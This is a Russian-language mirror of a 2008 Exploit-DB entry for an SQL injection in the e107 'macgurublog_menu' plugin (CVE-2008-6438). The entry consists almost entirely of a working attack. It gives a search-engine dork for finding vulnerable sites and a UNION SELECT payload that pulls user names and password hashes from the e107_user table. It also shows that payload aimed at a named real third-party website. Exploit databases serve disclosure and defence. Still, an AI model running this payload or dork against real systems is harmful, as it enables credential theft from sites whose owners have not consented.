- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6856
- Проверка EDB
-
- Пройдено
- Автор
- ZORLU
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6438
- Дата публикации
- 2008-10-28
Код:
e107 Plugin macgurublog_menu macgurublog.php (uid) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: [email protected]
date: 28/10/2008
n0te: YALNIZLIK YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
n0te: a.q kpss : ) )
dork: allinurl:"macgurublog.php?uid="
exploit:
http://localhost/script_path/macgurublog.php?uid=[SQL]
[SQL]=
-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
example:
http://www.dmchat.org.uk/e107_plugins/macgurublog_menu/macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user/*
thanks: str0ke
# milw0rm.com [2008-10-28]- Источник
- www.exploit-db.com
